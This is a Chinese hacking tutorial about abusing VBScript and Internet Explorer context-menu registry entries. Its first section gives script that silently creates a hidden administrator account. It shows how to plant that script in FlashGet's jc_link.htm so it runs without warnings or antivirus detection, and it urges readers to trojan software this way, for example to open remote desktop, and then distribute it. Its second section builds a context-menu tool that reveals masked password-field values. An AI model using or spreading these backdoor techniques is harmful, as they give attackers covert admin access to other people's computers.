讲解脚本语言的妙用

用网际快车做后门
        首先我们来看下面的一段代码：

<script language="VBScript">
Set r=CreateObject("Wscript.Shell")
r.run "net user 柳若寒 123 /add",0
r.run "net localgroup administrators 柳若寒 /add",0
</script>

        这是一段非常简单的VBScript代码，其中"net user 柳若寒 123 /add"和"net localgroup administrators 柳若寒 /add"的作用添加一个用户名为柳若寒、密码为123的账户，并提升为管理员。实际运用中，我们可以把它换成所需要的任意CMD命令，后面的参数0代表隐藏执行命令时的CMD窗口，代码执行有效需要本地管理员权限。把这段代码保存为html文件，运行后会弹出安全警告窗口，如图1所示，这样再傻的人都知道有问题了。那么怎样才能保证它的隐秘性呢？无意中我发现网际快车能帮我们这个忙。
        

        我们来看看IE右键菜单，当点击菜单中的使用快车（FlashGet）下载的时候，它会调用一个VBScript文件，试着把上面的代码插入这个文件看看会有什么效果。随便找一个下载链接，点击“右键→使用快车（FlashGet）下载”，结果发现居然不会有任何提示，成功地添加了账户。
        那么怎样知道它调用的是哪个文件呢？打开注册表，在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\中就是关于IE右键菜单的信息，找到与网际快车相关的项，会发现它调用的是安装目录中的jc_link.htm文件，如图2所示。把上面的代码插入jc_link.htm中就可以了，这样一来就绝对隐藏了，杀毒软件查不到，别人也不会想到你是在网际快车里面动的手脚。事实上不仅是网际快车，比如迅雷、QQ等，只要与注册表添加右键菜单有关的都可以用这种方法。大家可以把软件先进行改造，比如添加开3389命令之类的，再提供给别人下载，嘿嘿，这样威力就不是一般的大了。



打造最简单的星号密码查看器
        同样的思路，我们用VBScript和在注册表中添加IE右键菜单来实现星号密码查看器。我们先看看实现此功能的代码。
        
<script language="VBScript">  
  Sub GetPassword()  
  set srcEvent = external.menuArguments.event  
  Set doc=external.menuArguments.document  
  set ele=doc.elementFromPoint(srcEvent.clientX, srcEvent.clientY   )  
  if  ele.type   ="password" then  
  if  ele.value="" then  
  Alert("密码为空")  
  else  
  Alert("密码为:"+ele.value)  
  end if  
  end if  
  end sub  
  call GetPassword()  
</script>  

        把上面的代码保存为html文件，这里我保存为“d:\pass.html”。然后在注册表HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\下新建一个项，命名为“查看星号密码”，选中该项，把里面的字符串的数据改为保存的html文件的地址“d:\pass.html”，再在该项下增加一个DWORD值，值为4，表示只在右击表单元素时有效，如图3所示。关闭注册表，重新启动IE窗口就可以看到效果了。只要我们在密码框中点击右键选中该项，就会显示出密码框中的密码了。
黑客的基本